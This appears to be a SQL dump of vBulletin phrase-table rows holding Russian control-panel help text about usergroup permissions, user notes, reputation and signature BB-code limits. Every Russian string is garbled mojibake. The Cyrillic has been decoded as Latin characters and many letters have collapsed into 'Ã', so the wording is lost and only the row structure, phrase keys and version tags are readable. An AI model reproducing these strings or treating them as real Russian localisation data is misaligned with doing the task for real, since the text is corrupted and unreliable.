(24646, -1, 'usergroup_add_edit_canwhosonlinelocation_text', 'cphelptext', 'Åñëè ýòî ðà çðåøåÃèå âêëþ÷åÃî, ïîëüçîâà òåëè ýòîé ãðóïïû áóäóò âèäåòü çÃà ÷îê âîïðîñà ðÿäîì ñ ìåñòîÃà õîæäåÃèåì Ãà ñòðà Ãèöå online.php . ÃŽÃè ñìîãóò Ãà âåñòè ìûøêó Ãà çÃà ÷îê è óâèäåòü ïóòü ê ôà éëó êà æäîé ñòðà Ãèöû, ïðîñìà òðèâà åìîé ïîëüçîâà òåëåì. \r\nÑòà Ãèöà \"Êòî Ãà ôîðóìå\" äîëæÃà áûòü âêëþ÷åÃà â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà , èÃà ÷å ýòà îïöèÿ ÃÃ¥ áóäåò ðà áîòà òü. Òà êæå äîëæÃà áûòü âêëþ÷åÃà îïöèÿ \"Ìîæåò âèäåòü, êòî Ãà ôîðóìå\".', 'vbulletin', '', 0, ''),
(24647, -1, 'usergroup_add_edit_canwhosonlinelocation_title', 'cphelptext', 'Ìîæåò âèäåòü ðåà ëüÃîå ìåñòîÃà õîæäåÃèå ïîëüçîâà òåëåé (ôà éë/URL)', 'vbulletin', '', 0, ''),
(24648, -1, 'usergroup_add_edit_canviewownusernotes_text', 'cphelptext', 'Çà ìå÷à Ãèÿ ïîëüçîâà òåëåé ìîãóò áûòü ïðîñìîòðåÃû Ãà ñòðà Ãèöå çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ïîïà ñòü òóäà , Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ. \r\n\r\nÅñëè ïîëüçîâà òåëþ ÃÃ¥ äà Ãî ýòî ðà çðåøåÃèå, òî îà ÃÃ¥ ñìîæåò óâèäåòü ññûëêó \"Ãðîñìîòðåòü\" â ñâî¸ì ñîáñòâåÃÃîì ïðîôèëå.', 'vbulletin', '', 0, ''),
(24649, -1, 'usergroup_add_edit_canviewownusernotes_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ñâîè çà ìå÷à Ãèÿ', 'vbulletin', '', 0, ''),
(24650, -1, 'usergroup_add_edit_canmanageownusernotes_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå ïîçâîëèò óïðà âëÿòü çà ìå÷à Ãèÿìè ïîëüçîâà òåëÿìè, òî åñòü äà ñò âîçìîæÃîñòü ðåäà êòèðîâà òü è óäà ëÿòü çà ìå÷à Ãèÿ. \r\n\r\nÇà ìå÷à Ãèÿ ïîëüçîâà òåëåé óïðà âëÿþòñÿ Ãà ñòðà Ãèöå ïðîñìîòðà çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ïîïà ñòü òóäà , Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ.', 'vbulletin', 'zCarot', 1205942890, '3.7.0 Release Candidate 1'),
(24651, -1, 'usergroup_add_edit_canmanageownusernotes_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü çà ìå÷à Ãèÿ î ñåáå', 'vbulletin', '', 0, ''),
(24652, -1, 'usergroup_add_edit_canpostownusernotes_text', 'cphelptext', 'Ãîâîå çà ìå÷à Ãèå ïîëüçîâà òåëåé ìîæåò áûòü äîáà âëåÃî ïðè Ãà æà òèè ñÃà ÷à ëà Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ, à çà òåì Ãà ññûëêó Äîáà âèòü çà ìå÷à Ãèå .', 'vbulletin', '', 0, ''),
(24653, -1, 'usergroup_add_edit_canpostownusernotes_title', 'cphelptext', 'Ìîæåò îòïðà âëÿòü çà ìå÷à Ãèÿ î ñåáå', 'vbulletin', '', 0, ''),
(24654, -1, 'usergroup_add_edit_canviewothersusernotes_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïðà âî ïîëüçîâà òåëÿì ýòîé ãðóïïû ïðîñìà òðèâà òü çà ìå÷à Ãèÿ äðóãèõ ïîëüçîâà òåëåé. \r\n\r\nÇà ìå÷à Ãèÿ ïîëüçîâà òåëåé ìîãóò áûòü ïðîñìîòðåÃû Ãà ñòðà Ãèöå çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ïîïà ñòü òóäà , Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24655, -1, 'usergroup_add_edit_canviewothersusernotes_title', 'cphelptext', 'Ìîæåò ñìîòðåòü çà ìå÷à Ãèÿ äðóãèõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24656, -1, 'usergroup_add_edit_canmanageothersusernotes_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå ïîçâîëÿåò ïîëüçîâà òåëÿì ýòîé ãðóïïû ðåäà êòèðîâà òü/óäà ëÿòü çà ìå÷à Ãèÿ î äðóãèõ ïîëüçîâà òåëÿõ. Âà ì ñëåäóåò äà òü ýòî ïðà âî òîëüêî òåì ïîëüçîâà òåëÿì, êîòîðûì âû äîâåðÿåòå. \r\n\r\nÇà ìå÷à Ãèÿìè ïîëüçîâà òåëåé ìîæÃî óïðà âëÿòü Ãà ñòðà Ãèöå ñïèñêà çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ïîïà ñòü òóäà , Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24657, -1, 'usergroup_add_edit_canmanageothersusernotes_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü çà ìå÷à Ãèÿ äðóãèõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24658, -1, 'usergroup_add_edit_canpostothersusernotes_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïðà âî ó÷à ñòÃèêà ì ýòîé ãðóïïû îñòà âëÿòü çà ìå÷à Ãèÿ î äðóãèõ ïîëüçîâà òåëÿõ. \r\n\r\nÇà ìå÷à Ãèÿ ïîëüçîâà òåëåé ìîãóò áûòü îñòà âëåÃû Ãà ñòðà Ãèöå çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ñäåëà òü ýòî, ñÃà ÷à ëà Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ, à çà òåì Ãà ññûëêó Äîáà âèòü çà ìå÷à Ãèå .', 'vbulletin', '', 0, ''),
(24659, -1, 'usergroup_add_edit_canpostothersusernotes_title', 'cphelptext', 'Ìîæåò îòïðà âëÿòü çà ìå÷à Ãèÿ äðóãèì ïîëüçîâà òåëÿì', 'vbulletin', '', 0, ''),
(24660, -1, 'usergroup_add_edit_caneditownusernotes_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïðà âî ïîëüçîâà òåëÿì ýòîé ãðóïïû óïðà âëÿòü (ðåäà êòèðîâà òü/óäà ëÿòü) çà ìå÷à Ãèÿìè, îñòà âëåÃÃûìè èìè. Åñëè âû æåëà åòå, ÷òîáû çà ìå÷à Ãèÿ ïîëüçîâà òåëåé áûëè ïîñòîÿÃÃûìè, ÃÃ¥ äà âà éòå ýòîé ãðóïïå ïîëüçîâà òåëåé ýòî ðà çðåøåÃèå. \r\n\r\nÇà ìå÷à Ãèÿ ïîëüçîâà òåëåé óïðà âëÿþòñÿ Ãà ñòðà Ãèöå çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ïîïà ñòü òóäà , Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24661, -1, 'usergroup_add_edit_caneditownusernotes_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü ñîáñòâåÃÃûìè çà ìå÷à Ãèÿìè', 'vbulletin', '', 0, ''),
(24662, -1, 'usergroup_add_edit_canbeusernoted_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïðà âî äðóãèì ïîëüçîâà òåëÿì ïèñà òü çà ìå÷à Ãèÿ î ïîëüçîâà òåëÿõ ýòîé ãðóïïû, åñëè ó ïåðâûõ åñòü ñîîòâåòñòâóþùèå ïðà âà . \r\n\r\nÇà ìå÷à Ãèÿ ïîëüçîâà òåëåé ìîãóò áûòü îñòà âëåÃû Ãà ñòðà Ãèöå çà ìå÷à Ãèé ïîëüçîâà òåëåé. ×òîáû ñäåëà òü ýòî, ñÃà ÷à ëà Ãà æìèòå Ãà ññûëêó Çà ìå÷à Ãèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâà òåëÿ, à çà òåì Ãà ññûëêó Äîáà âèòü çà ìå÷à Ãèå .', 'vbulletin', '', 0, ''),
(24663, -1, 'usergroup_add_edit_canbeusernoted_title', 'cphelptext', 'Ãîëüçîâà òåëè ìîãóò ïèñà òü çà ìå÷à Ãèÿ îá ýòîé ãðóïïå', 'vbulletin', '', 0, ''),
(24664, -1, 'usergroup_add_edit_ismoderator_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ñò âñåé ãðóïïå ïðà âà ìîäåðà òîðà âî âñåõ ðà çäåëà õ. Ñóïåð-ìîäåðà òîðû ìîãóò äåëà òü âñå, âêëþ÷à ÿ ðåäà êòèðîâà Ãèå, óäà ëåÃèå, ïåðåìåùåÃèå, îáúåäèÃÃ¥Ãèå, ðà çäåëåÃèå è ò.ä. Âà ì ñëåäóåò äà âà òü ýòè ïðà âà òîëüêî òåì ëþäÿì, êîòîðûì âû äîâåðÿåòå.', 'vbulletin', '', 0, ''),
(24665, -1, 'usergroup_add_edit_ismoderator_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü ÂÑÅÌÈ ðà çäåëà ìè (ñóïåð-ìîäåðà òîð)', 'vbulletin', '', 0, ''),
(24666, -1, 'usergroup_add_edit_cancontrolpanel_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò äîñòóï ê ïà Ãåëè óïðà âëåÃèÿ. Âû èìååòå ïîëÃûé äîñòóï ê Ãà Ãåëè à äìèÃèñòðà òîðà , îäÃà êî âû äîëæÃû äà âà òü äîñòóï òîëüêî ïðîâåðåÃÃûì ëþäÿì.', 'vbulletin', '', 0, ''),
(24667, -1, 'usergroup_add_edit_cancontrolpanel_title', 'cphelptext', 'Èìååò äîñòóï ê ïà Ãåëè óïðà âëåÃèÿ (à äìèÃèñòðà òîð)', 'vbulletin', '', 0, ''),
(24668, -1, 'usergroup_add_edit_cannegativerep_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå ïîçâîëÿåò ïîëüçîâà òåëÿì ýòîé ãðóïïû äîáà âëÿòü îòðèöà òåëüÃóþ ðåïóòà öèþ. Îòðèöà òåëüÃà ÿ ðåïóòà öèÿ îòÃèìà åò òîëüêî ïîëîâèÃó çÃà ÷åÃèÿ îò ïîëîæèòåëüÃîé ðåïóòà öèè. Ãà ïðèìåð, åñëè âåñ ðåïóòà öèè ïîëüçîâà òåëÿ 20, òî îà ìîæåò îòÃÿòü òîëüêî 10 î÷êîâ ðåïóòà öèè. Ãòî ðà çðåøåÃèå òðåáóåò âêëþ÷åÃèÿ ñèñòåìû ðåïóòà öèè ïîëüçîâà òåëåé â îñÃîâÃûõ Ãà ñòðîéêà õ è âêëþ÷åÃèÿ îïöèè \"Ìîæåò èñïîëüçîâà òü ðåïóòà öèþ\" äëÿ ãðóïïû ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24669, -1, 'usergroup_add_edit_cannegativerep_title', 'cphelptext', 'Ìîæåò ïðèñâà èâà òü îòðèöà òåëüÃóþ ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(24670, -1, 'usergroup_add_edit_canuserep_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì îñòà âëÿòü êîììåÃòà ðèè ïðè äîáà âëåÃèè ðåïóòà öèè äðóãèì ïîëüçîâà òåëÿì. Ãåïóòà öèÿ äîëæÃà áûòü âêëþ÷åÃà â îñÃîâÃûõ Ãà ñòðîéêà õ.', 'vbulletin', '', 0, ''),
(24671, -1, 'usergroup_add_edit_canuserep_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(24672, -1, 'usergroup_add_edit_canseeownrep_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïðà âî ïîëüçîâà òåëÿì ÷èòà òü êîììåÃòà ðèè ïîëüçîâà òåëåé, îñòà âëåÃÃûå ñ ðåïóòà öèé, â ñâî¸ì êà áèÃåòå. Åñëè ïîëüçîâà òåëü âûáðà ë ñêðûòèå ñâîåé ðåïóòà öèè èëè ñèñòåìà ðåïóòà öèè âûêëþ÷åÃà , òî ñïèñîê êîììåÃòà ðèåâ ÃÃ¥ áóäåò îòîáðà æ¸à â ëþáîì ñëó÷à å.', 'vbulletin', '', 0, ''),
(24673, -1, 'usergroup_add_edit_canseeownrep_title', 'cphelptext', 'Ìîæåò âèäåòü ñâîþ ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(24674, -1, 'usergroup_add_edit_canhiderep_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïîëüçîâà òåëÿì âûáîð â ïà Ãåëè óïðà âëåÃèÿ ÃÃ¥ ó÷à ñòâîâà òü â ñèñòåìå ðåïóòà öèè. Ãîëüçîâà òåëü âñ¸ åù¸ ñìîæåò ïîëó÷à òü êîììåÃòà ðèè ê ðåïóòà öèè, Ãî åãî ðåïóòà öèÿ áóäåò ñêðûòà îò äðóãèõ.', 'vbulletin', 'zCarot', 1223482250, '3.8.0 Alpha 2'),
(24675, -1, 'usergroup_add_edit_canhiderep_title', 'cphelptext', 'Ìîæåò ñêðûâà òü ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(24676, -1, 'usergroup_add_edit_canseeothersrep_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò ïîëüçîâà òåëÿì âîçìîæÃîñòü ïðîñìà òðèâà òü êîììåÃòà ðèè ê ðåïóòà öèè äëÿ äðóãèõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24677, -1, 'usergroup_add_edit_canseeothersrep_title', 'cphelptext', 'Ìîæåò âèäåòü èçìåÃÃ¥Ãèÿ ðåïóòà öèè äðóãèõ', 'vbulletin', '', 0, ''),
(24678, -1, 'usergroup_add_edit_sigmaxrawchars_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ïîëüçîâà òåëü äà ÃÃîé ãðóïïû ìîæåò èñïîëüçîâà òü â ñâîåé ïîäïèñè. Ãðè ïîäñ÷¸òå áóäóò òà êæå ó÷èòûâà òüñÿ âñÿ ðà çìåòêà BB êîäà ìè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24679, -1, 'usergroup_add_edit_sigmaxrawchars_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â ïîäïèñè ó÷èòûâà ÿ ðà çìåòêó BB êîäà ìè', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24680, -1, 'usergroup_add_edit_sigmaxchars_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ïîëüçîâà òåëü äà ÃÃîé ãðóïïû ìîæåò èñïîëüçîâà òü â ñâîåé ïîäïèñè, ÃÃ¥ âêëþ÷à ÿ ðà çìåòêó BB êîäà ìè.  áîëüøèÃñòâå ñëó÷à åâ äà ÃÃîå çÃà ÷åÃèå ïðà êòè÷åñêè ñîîòâåòñòâóåò îáùåìó êîëè÷åñòâó ñèìâîëîâ, îòîáðà æà åìûõ â ïîäïèñè.', 'vbulletin', 'zCarot', 1206966128, '3.7.0 Release Candidate 2'),
(24681, -1, 'usergroup_add_edit_sigmaxchars_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â ïîäïèñè ÃÃ¥ ó÷èòûâà ÿ ðà çìåòêó BB êîäà ìè', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24682, -1, 'usergroup_add_edit_sigmaxlines_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ñòðîê, êîòîðûå ïîëüçîâà òåëü ìîæåò ïîìåñòèòü â ñâîåé ïîäïèñè. Ê ñîæà ëåÃèþ, äà ÃÃîå çÃà ÷åÃèå ÃÃ¥ ñîîòâåòñòâóåò îïðåäåë¸ÃÃîìó êîëè÷åñòâó ñèìâîëîâ â ðà çÃûõ îáîçðåâà òåëÿõ è ñòèëÿõ, ïîýòîìó âà ì ñëåäóåò âûñòà âëÿòü åãî, ó÷èòûâà ÿ âñ¸ ýòî. \r\n \r\nÌÿãêèé ïåðåÃîñ ñòðîê ìîæåò áûòü èñïîëüçîâà à äëÿ ïåðåÃîñà ñëîâ äëèÃÃîé ñòðîêè Ãà Ãåñêîëüêî ñòðîê, ÷òîáû ÃÃ¥ ðà ñòÿãèâà òü îòîáðà æà åìîå ñîäåðæèìîå ôîðóìà . Êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ïðåäïîëîæèòåëüÃî êà ê ðà ç çà ïîëÃÿò îäÃó ñòðîêó, óêà çûâà åòñÿ â ïà ðà ìåòðå "\"Ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â ñòðîêå ïîäïèñè\" ". Åñëè ðà çìåð òåêñòà ÃÃ¥ ñòà Ãäà ðòÃûé, òî èñïîëüçóåòñÿ ïðèáëèæ¸ÃÃîå çÃà ÷åÃèå, ÷òîáû ðà çìåð ñîâïà äà ë ñ ðà çìåðîì ñòà Ãäà ðòÃîãî òåêñòà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24683, -1, 'usergroup_add_edit_sigmaxlines_title', 'cphelptext', 'Ìà êñèìóì ñòðîê â ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24684, -1, 'usergroup_add_edit_canbbcode_text', 'cphelptext', 'Ãòî ãëîáà ëüÃûé ïåðåêëþ÷à òåëü ðà çðåøåÃèÿ èñïîëüçîâà Ãèÿ BB êîäîâ â ïîäïèñÿõ ïîëüçîâà òåëåé ýòîé ãðóïïû. Èñïîëüçîâà Ãèå èÃäèâèäóà ëüÃûõ BB êîäîâ êîÃòðîëèðóåòñÿ äîïîëÃèòåëüÃûìè ïðà âà ìè, óêà çà ÃÃûìè Ãèæå. \r\n \r\nÃîìÃèòå, ÷òî Ãåñòà Ãäà ðòÃûå BB êîäû ÃÃ¥ ìîãóò áûòü ïðîêîÃòðîëèðîâà Ãû Ãèêà êèìè ïðà âà ìè; âû ìîæåòå çà ïðåòèòü èõ èñïîëüçîâà Ãèå, òîëüêî çà ïðåòèâ âñå BB êîäû â ïîäïèñè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24685, -1, 'usergroup_add_edit_canbbcode_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24686, -1, 'usergroup_add_edit_canbbcodebasic_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîäû [b] (ïîëóæèðÃûé), [i] (êóðñèâ) è [u] (ïîä÷¸ðêÃóòûé). Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃûõ BB êîäîâ ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24687, -1, 'usergroup_add_edit_canbbcodebasic_title', 'cphelptext', 'Ãà çðåøèòü îñÃîâÃûå BB êîäû', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24688, -1, 'usergroup_add_edit_canbbcodecolor_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [color] (öâåò òåêñòà ). Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå. Âû ÃÃ¥ ìîæåòå îãðà Ãè÷èòü öâåòà òåêñòà ëèøü îïðåäåë¸ÃÃûìè öâåòà ìè ñ ïîìîùüþ äà ÃÃîé îïöèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24689, -1, 'usergroup_add_edit_canbbcodecolor_title', 'cphelptext', 'Ãà çðåøèòü BB êîä öâåòà ', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24690, -1, 'usergroup_add_edit_canbbcodesize_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [size] (ðà çìåð òåêñòà ). Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå. Âû ìîæåòå îãðà Ãè÷èòü ìà êñèìà ëüÃûé ðà çìåð òåêñòà , èñïîëüçóÿ ïà ðà ìåòð Ãèæå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24691, -1, 'usergroup_add_edit_canbbcodesize_title', 'cphelptext', 'Ãà çðåøèòü BB êîä ðà çìåðà ', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24692, -1, 'usergroup_add_edit_sigmaxsizebbcode_text', 'cphelptext', 'Îïðåäåëÿåò ìà êñèìà ëüÃûé ðà çìåð øðèôòà , êîòîðûé ìîãóò èñïîëüçîâà òü ïîëüçîâà òåëè äà ÃÃîé ãðóïïû â ñâîåé ïîäïèñè. Åñëè îÃè ïîïûòà þòñÿ èñïîëüçîâà òü áîëüøèé ðà çìåð, òî ïîÿâèòñÿ ñîîáùåÃèå îá îøèáêå. Ñà ìûé áîëüøîé ðà çìåð - 7; ðà çìåð ïî óìîë÷à Ãèþ - 2.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24693, -1, 'usergroup_add_edit_sigmaxsizebbcode_title', 'cphelptext', 'Ìà êñèìà ëüÃîå çÃà ÷åÃèå äëÿ X â BB êîäå [SIZE=x]', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24694, -1, 'usergroup_add_edit_canbbcodefont_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [font] (òèï øðèôòà ). Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå. Âû ÃÃ¥ ìîæåòå îãðà Ãè÷èòü âûáîð òèïà øðèôòà â ïîäïèñè âûáîðêîé ëèøü èç îïðåäåë¸ÃÃûõ øðèôòîâ ñ ïîìîùüþ ýòîé îïöèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24695, -1, 'usergroup_add_edit_canbbcodefont_title', 'cphelptext', 'Ãà çðåøèòü BB êîä øðèôòà ', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24696, -1, 'usergroup_add_edit_canbbcodealign_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîäû [left] (ñëåâà ), [center] (ïî öåÃòðó) è [right] (ñïðà âà ). Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃûõ BB êîäîâ ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24697, -1, 'usergroup_add_edit_canbbcodealign_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû ðà ñïîëîæåÃèÿ', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24698, -1, 'usergroup_add_edit_canbbcodelist_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [list] (ñïèñîê). Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå. Âû ÃÃ¥ ìîæåòå óïðà âëÿòü òèïà ìè ñïèñêîâ ñ ïîìîùüþ ýòîé îïöèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24699, -1, 'usergroup_add_edit_canbbcodelist_title', 'cphelptext', 'Ãà çðåøèòü BB êîä ñïèñêà ', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24700, -1, 'usergroup_add_edit_canbbcodelink_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîäû [email] è [url]. Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃûõ BB êîäîâ ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24701, -1, 'usergroup_add_edit_canbbcodelink_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû ññûëîê', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24702, -1, 'usergroup_add_edit_canbbcodecode_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [code]. Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24703, -1, 'usergroup_add_edit_canbbcodecode_title', 'cphelptext', 'Ãà çðåøèòü BB êîä CODE', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24704, -1, 'usergroup_add_edit_canbbcodephp_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [php]. Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24705, -1, 'usergroup_add_edit_canbbcodephp_title', 'cphelptext', 'Ãà çðåøèòü BB êîä PHP', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24706, -1, 'usergroup_add_edit_canbbcodehtml_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [html]. Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
